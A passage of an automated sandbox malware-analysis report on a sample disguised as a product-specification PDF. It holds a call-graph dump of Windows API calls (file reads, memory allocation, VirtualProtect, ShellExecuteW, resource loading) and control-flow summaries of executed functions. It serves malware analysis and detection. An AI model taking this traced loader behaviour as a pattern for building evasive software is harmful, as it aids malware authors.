97255->97256 97256->97252 97256->97253 97256->97254 97256->97255 97257 a6ea0c 21 API calls ___std_exception_copy 97256->97257 97258 a47510 53 API calls 97256->97258 97286 aaefae 24 API calls _wcslen 97256->97286 97257->97256 97258->97256 97261 a5fc85 97260->97261 97262 a5fd1d VirtualProtect 97261->97262 97263 a5fceb 97261->97263 97262->97263 97263->97213 97263->97214 97264->97223 97265->97223 97266->97217 97267->97219 97268->97221 97269->97225 97270->97230 97271->97230 97272->97230 97273->97202 97274->97230 97276 aa8e74 _wcslen 97275->97276 97277 aa8f63 97276->97277 97279 aa8ea9 97276->97279 97281 aa8f68 97276->97281 97277->97238 97277->97244 97279->97277 97284 a5ce60 41 API calls 97279->97284 97281->97277 97285 a5ce60 41 API calls 97281->97285 97282->97241 97283->97243 97284->97279 97285->97281 97286->97256 97316 a46270 97287->97316 97289 a49fd2 97290 a4a4a1 22 API calls 97289->97290 97291 a49fec 97290->97291 97291->97072 97294 a4a6c3 22 API calls 97314 a49eb5 97294->97314 97295 a8f7c4 97326 aa96e2 84 API calls __wsopen_s 97295->97326 97296 a8f699 97302 a5fddb 22 API calls 97296->97302 97297 a4a405 97297->97291 97327 aa96e2 84 API calls __wsopen_s 97297->97327 97300 a4a4a1 22 API calls 97300->97314 97304 a8f754 97302->97304 97303 a8f7d2 97305 a4a4a1 22 API calls 97303->97305 97307 a5fe0b 22 API calls 97304->97307 97306 a8f7e8 97305->97306 97306->97291 97309 a4a12c __fread_nolock 97307->97309 97309->97295 97309->97297 97310 a4a587 22 API calls 97310->97314 97311 a4aec9 22 API calls 97312 a4a0db CharUpperBuffW 97311->97312 97322 a4a673 22 API calls 97312->97322 97314->97289 97314->97294 97314->97295 97314->97296 97314->97297 97314->97300 97314->97309 97314->97310 97314->97311 97321 a44573 41 API calls _wcslen 97314->97321 97323 a448c8 23 API calls 97314->97323 97324 a449bd 22 API calls __fread_nolock 97314->97324 97325 a4a673 22 API calls 97314->97325 97315->97076 97317 a5fe0b 22 API calls 97316->97317 97318 a46295 97317->97318 97319 a5fddb 22 API calls 97318->97319 97320 a462a3 97319->97320 97320->97314 97321->97314 97322->97314 97323->97314 97324->97314 97325->97314 97326->97303 97327->97291 97329 a4a961 22 API calls 97328->97329 97330 aa92de 97329->97330 97331 a46270 22 API calls 97330->97331 97332 aa92f2 97331->97332 97333 aa8e54 41 API calls 97332->97333 97336 aa9314 97332->97336 97334 aa930e 97333->97334 97334->97336 97354 a46d25 22 API calls __fread_nolock 97334->97354 97335 aa8e54 41 API calls 97335->97336 97336->97335 97339 aa93b3 97336->97339 97340 a46350 22 API calls 97336->97340 97343 aa9397 97336->97343 97355 a46d25 22 API calls __fread_nolock 97336->97355 97341 a4a8c7 22 API calls 97339->97341 97342 aa93c2 97339->97342 97340->97336 97341->97342 97342->97111 97356 a46d25 22 API calls __fread_nolock 97343->97356 97345 aa93a7 97346 a46350 22 API calls 97345->97346 97346->97339 97347->97091 97348->97102 97349->97108 97350->97110 97351->97096 97352->97097 97353->97110 97354->97336 97355->97336 97356->97345 97358 ab99e8 97357->97358 97359 ab9902 97357->97359 97415 ab9caa 39 API calls 97358->97415 97361 a5fddb 22 API calls 97359->97361 97362 ab9909 97361->97362 97363 a5fe0b 22 API calls 97362->97363 97364 ab991a 97363->97364 97365 a46246 CloseHandle 97364->97365 97368 ab9925 97365->97368 97366 ab9ac5 97408 ab1e96 97366->97408 97367 ab99a2 97367->97366 97369 ab99ca 97367->97369 97374 ab9a33 97367->97374 97371 a4a961 22 API calls 97368->97371 97369->97115 97373 ab992d 97371->97373 97372 ab9acc 97378 aaccff 4 API calls 97372->97378 97375 a46246 CloseHandle 97373->97375 97376 a47510 53 API calls 97374->97376 97377 ab9934 97375->97377 97384 ab9a3a 97376->97384 97380 a47510 53 API calls 97377->97380 97402 ab9aa8 97378->97402 97379 ab9abb 97426 aacd57 30 API calls 97379->97426 97383 ab9940 97380->97383 97381 ab9a6e 97385 a46270 22 API calls 97381->97385 97386 a46246 CloseHandle 97383->97386 97384->97379 97384->97381 97388 ab9a7e 97385->97388 97389 ab994a 97386->97389 97387 a46246 CloseHandle 97390 ab9b1e 97387->97390 97391 ab9a8e 97388->97391 97394 a4a8c7 22 API calls 97388->97394 97392 a45745 5 API calls 97389->97392 97427 a46216 CloseHandle messages 97390->97427 97416 a433c6 97391->97416 97395 ab9959 97392->97395 97394->97391 97397 ab995d 97395->97397 97398 ab99c2 97395->97398 97412 a453de 27 API calls messages 97397->97412 97414 a46216 CloseHandle messages 97398->97414 97402->97369 97402->97387 97404 ab996b 97413 a453c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97404->97413 97406 ab9972 97406->97367 97407 aaccff 4 API calls 97406->97407 97407->97367 97409 ab1e9f 97408->97409 97410 ab1ea4 97408->97410 97428 ab0f67 24 API calls __fread_nolock 97409->97428 97410->97372 97412->97404 97413->97406 97414->97369 97415->97367 97417 a830bb 97416->97417 97418 a433dd 97416->97418 97420 a5fddb 22 API calls 97417->97420 97429 a433ee 97418->97429 97422 a830c5 _wcslen 97420->97422 97421 a433e8 97425 aacd57 30 API calls 97421->97425 97423 a5fe0b 22 API calls 97422->97423 97424 a830fe __fread_nolock 97423->97424 97425->97402 97426->97402 97427->97369 97428->97410 97430 a433fe _wcslen 97429->97430 97431 a8311d 97430->97431 97432 a43411 97430->97432 97433 a5fddb 22 API calls 97431->97433 97434 a4a587 22 API calls 97432->97434 97436 a83127 97433->97436 97435 a4341e __fread_nolock 97434->97435 97435->97421 97437 a5fe0b 22 API calls 97436->97437 97438 a83157 __fread_nolock 97437->97438 97440 ac56a4 97439->97440 97445 ac56f2 97439->97445 97441 a5fe0b 22 API calls 97440->97441 97442 ac56c6 97441->97442 97443 a5fddb 22 API calls 97442->97443 97442->97445 97457 ab0a59 22 API calls 97442->97457 97443->97442 97445->97126 97447 ab0ada 97446->97447 97449 ab0b13 97446->97449 97448 a5fddb 22 API calls 97447->97448 97447->97449 97448->97449 97449->97152 97450->97153 97451->97137 97452->97142 97453->97153 97454->97154 97455->97158 97456->97153 97457->97442 97458 a82ba5 97459 a42b25 97458->97459 97460 a82baf 97458->97460 97486 a42b83 7 API calls 97459->97486 97501 a43a5a 97460->97501 97464 a82bb8 97466 a49cb3 22 API calls 97464->97466 97468 a82bc6 97466->97468 97467 a42b2f 97473 a42b44 97467->97473 97490 a43837 97467->97490 97469 a82bce 97468->97469 97470 a82bf5 97468->97470 97474 a433c6 22 API calls 97469->97474 97471 a433c6 22 API calls 97470->97471 97475 a82bf1 GetForegroundWindow ShellExecuteW 97471->97475 97478 a42b5f 97473->97478 97500 a430f2 Shell_NotifyIconW ___scrt_fastfail 97473->97500 97476 a82bd9 97474->97476 97480 a82c26 97475->97480 97479 a46350 22 API calls 97476->97479 97483 a42b66 SetCurrentDirectoryW 97478->97483 97482 a82be7 97479->97482 97480->97478 97484 a433c6 22 API calls 97482->97484 97485 a42b7a 97483->97485 97484->97475 97508 a42cd4 7 API calls 97486->97508 97488 a42b2a 97489 a42c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97488->97489 97489->97467 97491 a43862 ___scrt_fastfail 97490->97491 97509 a44212 97491->97509 97495 a43906 Shell_NotifyIconW 97513 a43923 97495->97513 97496 a83386 Shell_NotifyIconW 97497 a438e8 97497->97495 97497->97496 97499 a4391c 97499->97473 97500->97478 97502 a81f50 __wsopen_s 97501->97502 97503 a43a67 GetModuleFileNameW 97502->97503 97504 a49cb3 22 API calls 97503->97504 97505 a43a8d 97504->97505 97506 a43aa2 23 API calls 97505->97506 97507 a43a97 97506->97507 97507->97464 97508->97488 97510 a438b7 97509->97510 97511 a835a4 97509->97511 97510->97497 97535 aac874 42 API calls _strftime 97510->97535 97511->97510 97512 a835ad DestroyIcon 97511->97512 97512->97510 97514 a4393f 97513->97514 97533 a43a13 97513->97533 97515 a46270 22 API calls 97514->97515 97516 a4394d 97515->97516 97517 a83393 LoadStringW 97516->97517 97518 a4395a 97516->97518 97520 a833ad 97517->97520 97519 a46b57 22 API calls 97518->97519 97521 a4396f 97519->97521 97526 a4a8c7 22 API calls 97520->97526 97528 a43994 ___scrt_fastfail 97520->97528 97522 a833c9 97521->97522 97523 a4397c 97521->97523 97525 a46350 22 API calls 97522->97525 97523->97520 97524 a43986 97523->97524 97527 a46350 22 API calls 97524->97527 97529 a833d7 97525->97529 97526->97528 97527->97528 97531 a439f9 Shell_NotifyIconW 97528->97531 97529->97528 97530 a433c6 22 API calls 97529->97530 97532 a833f9 97530->97532 97531->97533 97534 a433c6 22 API calls 97532->97534 97533->97499 97534->97528 97535->97497 97536 141e090 97550 141bce0 97536->97550 97538 141e15e 97553 141df80 97538->97553 97540 141e187 CreateFileW 97542 141e1d6 97540->97542 97543 141e1db 97540->97543 97543->97542 97544 141e1f2 VirtualAlloc 97543->97544 97544->97542 97545 141e210 ReadFile 97544->97545 97545->97542 97546 141e22b 97545->97546 97547 141cf80 13 API calls 97546->97547 97548 141e25e 97547->97548 97549 141e281 ExitProcess 97548->97549 97549->97542 97552 141c36b 97550->97552 97556 141f190 GetPEB 97550->97556 97552->97538 97554 141df89 Sleep 97553->97554 97555 141df97 97554->97555 97556->97552 97557 a43156 97560 a43170 97557->97560 97561 a43187 97560->97561 97562 a4318c 97561->97562 97563 a431eb 97561->97563 97604 a431e9 97561->97604 97564 a43265 PostQuitMessage 97562->97564 97565 a43199 97562->97565 97567 a82dfb 97563->97567 97568 a431f1 97563->97568 97572 a4316a 97564->97572 97570 a431a4 97565->97570 97571 a82e7c 97565->97571 97566 a431d0 DefWindowProcW 97566->97572 97609 a418e2 10 API calls 97567->97609 97573 a4321d SetTimer RegisterWindowMessageW 97568->97573 97574 a431f8 97568->97574 97576 a82e68 97570->97576 97577 a431ae 97570->97577 97614 aabf30 34 API calls ___scrt_fastfail 97571->97614 97573->97572 97578 a43246 CreatePopupMenu 97573->97578 97580 a82d9c 97574->97580 97581 a43201 KillTimer 97574->97581 97575 a82e1c 97610 a5e499 42 API calls 97575->97610 97613 aac161 27 API calls ___scrt_fastfail 97576->97613 97585 a82e4d 97577->97585 97586 a431b9 97577->97586 97578->97572 97588 a82da1 97580->97588 97589 a82dd7 MoveWindow 97580->97589 97605 a430f2 Shell_NotifyIconW ___scrt_fastfail 97581->97605 97585->97566 97612 aa0ad7 22 API calls 97585->97612 97592 a431c4 97586->97592 97593 a43253 97586->97593 97587 a82e8e 97587->97566 97587->97572 97594 a82dc6 SetFocus 97588->97594 97595 a82da7 97588->97595 97589->97572 97590 a43214 97606 a43c50 DeleteObject DestroyWindow 97590->97606 97591 a43263 97591->97572 97592->97566 97611 a430f2 Shell_NotifyIconW ___scrt_fastfail 97592->97611 97607 a4326f 44 API calls ___scrt_fastfail 97593->97607 97594->97572 97595->97592 97599 a82db0 97595->97599 97608 a418e2 10 API calls 97599->97608 97602 a82e41 97603 a43837 49 API calls 97602->97603 97603->97604 97604->97566 97605->97590 97606->97572 97607->97591 97608->97572 97609->97575 97610->97592 97611->97602 97612->97604 97613->97591 97614->97587 97615 a42e37 97616 a4a961 22 API calls 97615->97616 97617 a42e4d 97616->97617 97694 a44ae3 97617->97694 97619 a42e6b 97620 a43a5a 24 API calls 97619->97620 97621 a42e7f 97620->97621 97622 a49cb3 22 API calls 97621->97622 97623 a42e8c 97622->97623 97624 a44ecb 94 API calls 97623->97624 97625 a42ea5 97624->97625 97626 a82cb0 97625->97626 97627 a42ead 97625->97627 97628 ab2cf9 80 API calls 97626->97628 97630 a4a8c7 22 API calls 97627->97630 97629 a82cc3 97628->97629 97632 a44f39 68 API calls 97629->97632 97633 a82ccf 97629->97633 97631 a42ec3 97630->97631 97708 a46f88 22 API calls 97631->97708 97632->97633 97635 a44f39 68 API calls 97633->97635 97637 a82ce5 97635->97637 97636 a42ecf 97638 a49cb3 22 API calls 97636->97638 97724 a43084 22 API calls 97637->97724 97639 a42edc 97638->97639 97709 a4a81b 41 API calls 97639->97709 97642 a42eec 97644 a49cb3 22 API calls 97642->97644 97643 a82d02 97725 a43084 22 API calls 97643->97725 97646 a42f12 97644->97646 97710 a4a81b 41 API calls 97646->97710 97648 a82d1e 97649 a43a5a 24 API calls 97648->97649 97651 a82d44 97649->97651 97650 a42f21 97654 a4a961 22 API calls 97650->97654 97726 a43084 22 API calls 97651->97726 97653 a82d50 97655 a4a8c7 22 API calls 97653->97655 97656 a42f3f 97654->97656 97657 a82d5e 97655->97657 97711 a43084 22 API calls 97656->97711 97727 a43084 22 API calls 97657->97727 97660 a42f4b 97712 a64a28 40 API calls 3 library calls 97660->97712 97661 a82d6d 97665 a4a8c7 22 API calls 97661->97665 97663 a42f59 97663->97637 97664 a42f63 97663->97664 97713 a64a28 40 API calls 3 library calls 97664->97713 97667 a82d83 97665->97667 97728 a43084 22 API calls 97667->97728 97668 a42f6e 97668->97643 97670 a42f78 97668->97670 97714 a64a28 40 API calls 3 library calls 97670->97714 97672 a82d90 97673 a42f83 97673->97648 97674 a42f8d 97673->97674 97715 a64a28 40 API calls 3 library calls 97674->97715 97676 a42f98 97677 a42fdc 97676->97677 97716 a43084 22 API calls 97676->97716 97677->97661 97678 a42fe8 97677->97678 97678->97672 97718 a463eb 22 API calls 97678->97718 97681 a42fbf 97683 a4a8c7 22 API calls 97681->97683 97682 a42ff8 97719 a46a50 22 API calls 97682->97719 97685 a42fcd 97683->97685 97717 a43084 22 API calls 97685->97717 97686 a43006 97720 a470b0 23 API calls 97686->97720 97691 a43021 97692 a43065 97691->97692 97721 a46f88 22 API calls 97691->97721 97722 a470b0 23 API calls 97691->97722 97723 a43084 22 API calls 97691->97723 97695 a44af0 __wsopen_s 97694->97695 97696 a46b57 22 API calls 97695->97696 97697 a44b22 97695->97697 97696->97697 97703 a44b58 97697->97703 97729 a44c6d 97697->97729 97699 a44c6d 22 API calls 97699->97703 97700 a49cb3 22 API calls 97702 a44c52 97700->97702 97701 a49cb3 22 API calls 97701->97703 97704 a4515f 22 API calls 97702->97704 97703->97699 97703->97701 97705 a4515f 22 API calls 97703->97705 97707 a44c29 97703->97707 97706 a44c5e 97704->97706 97705->97703 97706->97619 97707->97700 97707->97706 97708->97636 97709->97642 97710->97650 97711->97660 97712->97663 97713->97668 97714->97673 97715->97676 97716->97681 97717->97677 97718->97682 97719->97686 97720->97691 97721->97691 97722->97691 97723->97691 97724->97643 97725->97648 97726->97653 97727->97661 97728->97672 97730 a4aec9 22 API calls 97729->97730 97731 a44c78 97730->97731 97731->97697 97732 a41033 97737 a44c91 97732->97737 97736 a41042 97738 a4a961 22 API calls 97737->97738 97739 a44cff 97738->97739 97745 a43af0 97739->97745 97742 a44d9c 97743 a41038 97742->97743 97748 a451f7 22 API calls __fread_nolock 97742->97748 97744 a600a3 29 API calls __onexit 97743->97744 97744->97736 97749 a43b1c 97745->97749 97748->97742 97750 a43b0f 97749->97750 97751 a43b29 97749->97751 97750->97742 97751->97750 97752 a43b30 RegOpenKeyExW 97751->97752 97752->97750 97753 a43b4a RegQueryValueExW 97752->97753 97754 a43b80 RegCloseKey 97753->97754 97755 a43b6b 97753->97755 97754->97750 97755->97754 97756 a4f7bf 97757 a4fcb6 97756->97757 97758 a4f7d3 97756->97758 97793 a4aceb 23 API calls messages 97757->97793 97760 a4fcc2 97758->97760 97761 a5fddb 22 API calls 97758->97761 97794 a4aceb 23 API calls messages 97760->97794 97763 a4f7e5 97761->97763 97763->97760 97764 a4f83e 97763->97764 97765 a4fd3d 97763->97765 97767 a51310 207 API calls 97764->97767 97789 a4ed9d messages 97764->97789 97795 ab1155 22 API calls 97765->97795 97788 a4ec76 messages 97767->97788 97768 a4fef7 97775 a4a8c7 22 API calls 97768->97775 97768->97789 97771 a94600 97777 a4a8c7 22 API calls 97771->97777 97771->97789 97772 a94b0b 97797 ab359c 82 API calls __wsopen_s 97772->97797 97773 a4a8c7 22 API calls 97773->97788 97775->97789 97777->97789 97779 a4fbe3 97781 a94bdc 97779->97781 97779->97789 97790 a4f3ae messages 97779->97790 97780 a4a961 22 API calls 97780->97788 97798 ab359c 82 API calls __wsopen_s 97781->97798 97783 a60242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97783->97788 97784 a94beb 97799 ab359c 82 API calls __wsopen_s 97784->97799 97785 a601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97785->97788 97786 a600a3 29 API calls pre_c_initialization 97786->97788 97787 a5fddb 22 API calls 97787->97788 97788->97768 97788->97771 97788->97772 97788->97773 97788->97779 97788->97780 97788->97783 97788->97784 97788->97785 97788->97786 97788->97787 97788->97789 97788->97790 97791 a501e0 207 API calls 2 library calls 97788->97791 97792 a506a0 41 API calls messages 97788->97792 97790->97789 97796 ab359c 82 API calls __wsopen_s 97790->97796 97791->97788 97792->97788 97793->97760 97794->97765 97795->97789 97796->97789 97797->97789 97798->97784 97799->97789 97800 a41098 97805 a442de 97800->97805 97804 a410a7 97806 a4a961 22 API calls 97805->97806 97807 a442f5 GetVersionExW 97806->97807 97808 a46b57 22 API calls 97807->97808 97809 a44342 97808->97809 97810 a44378 97809->97810 97811 a493b2 22 API calls 97809->97811 97813 a4441b GetCurrentProcess IsWow64Process 97810->97813 97816 a837df 97810->97816 97812 a4436c 97811->97812 97814 a437a0 22 API calls 97812->97814 97815 a44437 97813->97815 97814->97810 97817 a4444f LoadLibraryA 97815->97817 97818 a83824 GetSystemInfo 97815->97818 97819 a44460 GetProcAddress 97817->97819 97820 a4449c GetSystemInfo 97817->97820 97819->97820 97821 a44470 GetNativeSystemInfo 97819->97821 97822 a44476 97820->97822 97821->97822 97823 a4109d 97822->97823 97824 a4447a FreeLibrary 97822->97824 97825 a600a3 29 API calls __onexit 97823->97825 97824->97823 97825->97804 97826 a603fb 97827 a60407 ___DestructExceptionObject 97826->97827 97855 a5feb1 97827->97855 97829 a6040e 97830 a60561 97829->97830 97834 a60438 97829->97834 97882 a6083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97830->97882 97832 a60568 97883 a64e52 28 API calls _abort 97832->97883 97843 a60477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97834->97843 97866 a7247d 97834->97866 97835 a6056e 97884 a64e04 28 API calls _abort 97835->97884 97839 a60576 97840 a60457 97842 a604d8 97874 a60959 97842->97874 97843->97842 97878 a64e1a 38 API calls 3 library calls 97843->97878 97846 a604de 97847 a604f3 97846->97847 97879 a60992 GetModuleHandleW 97847->97879 97849 a604fa 97849->97832 97850 a604fe 97849->97850 97851 a60507 97850->97851 97880 a64df5 28 API calls _abort 97850->97880 97881 a60040 13 API calls 2 library calls 97851->97881 97854 a6050f 97854->97840 97856 a5feba 97855->97856 97885 a60698 IsProcessorFeaturePresent 97856->97885 97858 a5fec6 97886 a62c94 10 API calls 3 library calls 97858->97886 97860 a5fecb 97861 a5fecf 97860->97861 97887 a72317 97860->97887 97861->97829 97864 a5fee6 97864->97829 97869 a72494 97866->97869 97867 a60a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 97868 a60451 97867->97868 97868->97840 97870 a72421 97868->97870 97869->97867 97873 a72450 97870->97873 97871 a60a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 97872 a72479 97871->97872 97872->97843 97873->97871 97903 a62340 97874->97903 97877 a6097f 97877->97846 97878->97842 97879->97849 97880->97851 97881->97854 97882->97832 97883->97835 97884->97839 97885->97858 97886->97860 97891 a7d1f6 97887->97891 97890 a62cbd 8 API calls 3 library calls 97890->97861 97894 a7d20f 97891->97894 97893 a5fed8 97893->97864 97893->97890 97895 a60a8c 97894->97895 97896 a60a97 IsProcessorFeaturePresent 97895->97896 97897 a60a95 97895->97897 97899 a60c5d 97896->97899 97897->97893 97902 a60c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97899->97902 97901 a60d40 97901->97893 97902->97901 97904 a6096c GetStartupInfoW 97903->97904 97904->97877 97905 a4105b 97910 a4344d 97905->97910 97907 a4106a 97941 a600a3 29 API calls __onexit 97907->97941 97909 a41074 97911 a4345d __wsopen_s 97910->97911 97912 a4a961 22 API calls 97911->97912 97913 a43513 97912->97913 97914 a43a5a 24 API calls 97913->97914 97915 a4351c 97914->97915 97942 a43357 97915->97942 97918 a433c6 22 API calls 97919 a43535 97918->97919 97920 a4515f 22 API calls 97919->97920 97921 a43544 97920->97921 97922 a4a961 22 API calls 97921->97922 97923 a4354d 97922->97923 97924 a4a6c3 22 API calls 97923->97924 97925 a43556 RegOpenKeyExW 97924->97925 97926 a83176 RegQueryValueExW 97925->97926 97930 a43578 97925->97930 97927 a8320c RegCloseKey 97926->97927 97928 a83193 97926->97928 97927->97930 97940 a8321e _wcslen 97927->97940 97929 a5fe0b 22 API calls 97928->97929 97931 a831ac 97929->97931 97930->97907 97932 a45722 22 API calls 97931->97932 97933 a831b7 RegQueryValueExW 97932->97933 97934 a831d4 97933->97934 97937 a831ee messages 97933->97937 97935 a46b57 22 API calls 97934->97935 97935->97937 97936 a44c6d 22 API calls 97936->97940 97937->97927 97938 a49cb3 22 API calls 97938->97940 97939 a4515f 22 API calls 97939->97940 97940->97930 97940->97936 97940->97938 97940->97939 97941->97909 97943 a81f50 __wsopen_s 97942->97943 97944 a43364 GetFullPathNameW 97943->97944 97945 a43386 97944->97945 97946 a46b57 22 API calls 97945->97946 97947 a433a4 97946->97947 97947->97918 97948 a72df8 GetLastError 97949 a72e11 97948->97949 97950 a72e17 97948->97950 97967 a7320e 11 API calls 2 library calls 97949->97967 97952 a74c7d FindHandlerForForeignException 17 API calls 97950->97952 97954 a72e6e SetLastError 97950->97954 97953 a72e29 97952->97953 97955 a72e31 97953->97955 97968 a73264 11 API calls 2 library calls 97953->97968 97956 a72e77 97954->97956 97959 a729c8 _free 17 API calls 97955->97959 97958 a72e46 97958->97955 97960 a72e4d 97958->97960 97961 a72e37 97959->97961 97969 a72be6 20 API calls FindHandlerForForeignException 97960->97969 97963 a72e65 SetLastError 97961->97963 97963->97956 97964 a72e58 97965 a729c8 _free 17 API calls 97964->97965 97966 a72e5e 97965->97966 97966->97954 97966->97963 97967->97950 97968->97958 97969->97964

                                                                                                                Executed Functions

                                                                                                                Function 00A442DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 234 a442de-a4434d call a4a961 GetVersionExW call a46b57 239 a44353 234->239 240 a83617-a8362a 234->240 241 a44355-a44357 239->241 242 a8362b-a8362f 240->242 245 a4435d-a443bc call a493b2 call a437a0 241->245 246 a83656 241->246 243 a83631 242->243 244 a83632-a8363e 242->244 243->244 244->242 247 a83640-a83642 244->247 263 a443c2-a443c4 245->263 264 a837df-a837e6 245->264 250 a8365d-a83660 246->250 247->241 249 a83648-a8364f 247->249 249->240 252 a83651 249->252 253 a83666-a836a8 250->253 254 a4441b-a44435 GetCurrentProcess IsWow64Process 250->254 252->246 253->254 258 a836ae-a836b1 253->258 256 a44494-a4449a 254->256 257 a44437 254->257 260 a4443d-a44449 256->260 257->260 261 a836db-a836e5 258->261 262 a836b3-a836bd 258->262 265 a4444f-a4445e LoadLibraryA 260->265 266 a83824-a83828 GetSystemInfo 260->266 270 a836f8-a83702 261->270 271 a836e7-a836f3 261->271 267 a836ca-a836d6 262->267 268 a836bf-a836c5 262->268 263->250 269 a443ca-a443dd 263->269 272 a837e8 264->272 273 a83806-a83809 264->273 279 a44460-a4446e GetProcAddress 265->279 280 a4449c-a444a6 GetSystemInfo 265->280 267->254 268->254 281 a443e3-a443e5 269->281 282 a83726-a8372f 269->282 275 a83704-a83710 270->275 276 a83715-a83721 270->276 271->254 274 a837ee 272->274 277 a8380b-a8381a 273->277 278 a837f4-a837fc 273->278 274->278 275->254 276->254 277->274 287 a8381c-a83822 277->287 278->273 279->280 288 a44470-a44474 GetNativeSystemInfo 279->288 289 a44476-a44478 280->289 283 a8374d-a83762 281->283 284 a443eb-a443ee 281->284 285 a8373c-a83748 282->285 286 a83731-a83737 282->286 292 a8376f-a8377b 283->292 293 a83764-a8376a 283->293 290 a443f4-a4440f 284->290 291 a83791-a83794 284->291 285->254 286->254 287->278 288->289 294 a44481-a44493 289->294 295 a4447a-a4447b FreeLibrary 289->295 296 a44415 290->296 297 a83780-a8378c 290->297 291->254 298 a8379a-a837c1 291->298 292->254 293->254 295->294 296->254 297->254 299 a837ce-a837da 298->299 300 a837c3-a837c9 298->300 299->254 300->254
                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32(?), ref: 00A4430D
                                                                                                                  • Part of subcall function 00A46B57: _wcslen.LIBCMT ref: 00A46B6A
                                                                                                                • GetCurrentProcess.KERNEL32(?,00ADCB64,00000000,?,?), ref: 00A44422
                                                                                                                • IsWow64Process.KERNEL32(00000000,?,?), ref: 00A44429
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00A44454
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A44466
                                                                                                                • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00A44474
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 00A4447B
                                                                                                                • GetSystemInfo.KERNEL32(?,?,?), ref: 00A444A0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                • API String ID: 3290436268-3101561225
                                                                                                                • Opcode ID: 9aed2384400259509bec50cc25570649213850ca8c5fd6b63b16b57ec0bc965c
                                                                                                                • Instruction ID: d08489f8464dd15a527846063a3d017444b37d503552765dce5eb8f4be681b0f
                                                                                                                • Opcode Fuzzy Hash: 9aed2384400259509bec50cc25570649213850ca8c5fd6b63b16b57ec0bc965c
                                                                                                                • Instruction Fuzzy Hash: E8A1B57690A2D0FFCB11D77D7C453D97FA46B66700BC8CCAAD2A193A2ADA304505CB2D
                                                                                                                Function 00A442A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 553 a442a2-a442ba CreateStreamOnHGlobal 554 a442bc-a442d3 FindResourceExW 553->554 555 a442da-a442dd 553->555 556 a835ba-a835c9 LoadResource 554->556 557 a442d9 554->557 556->557 558 a835cf-a835dd SizeofResource 556->558 557->555 558->557 559 a835e3-a835ee LockResource 558->559 559->557 560 a835f4-a83612 559->560 560->557
                                                                                                                APIs
                                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00A450AA,?,?,00000000,00000000), ref: 00A442B2
                                                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00A450AA,?,?,00000000,00000000), ref: 00A442C9
                                                                                                                • LoadResource.KERNEL32(?,00000000,?,?,00A450AA,?,?,00000000,00000000,?,?,?,?,?,?,00A44F20), ref: 00A835BE
                                                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,00A450AA,?,?,00000000,00000000,?,?,?,?,?,?,00A44F20), ref: 00A835D3
                                                                                                                • LockResource.KERNEL32(00A450AA,?,?,00A450AA,?,?,00000000,00000000,?,?,?,?,?,?,00A44F20,?), ref: 00A835E6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
